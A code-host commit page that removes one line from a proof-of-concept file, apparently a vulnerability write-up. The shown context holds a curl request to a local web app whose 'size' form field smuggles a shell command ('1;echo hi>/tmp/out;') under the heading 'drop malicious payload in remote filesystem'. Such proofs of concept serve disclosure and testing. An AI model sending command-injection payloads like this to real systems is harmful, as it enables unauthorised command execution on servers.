Update proof.md
This commit is contained in:
parent
f491310cbd
commit
2d45436f90
1 changed files with 0 additions and 1 deletions
|
|
@ -24,5 +24,4 @@ drop malicious payload in remote filesystem
|
|||
curl 'http://localhost:5000/home' \
|
||||
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \
|
||||
--data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \
|
||||
--compressed
|
||||
```
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue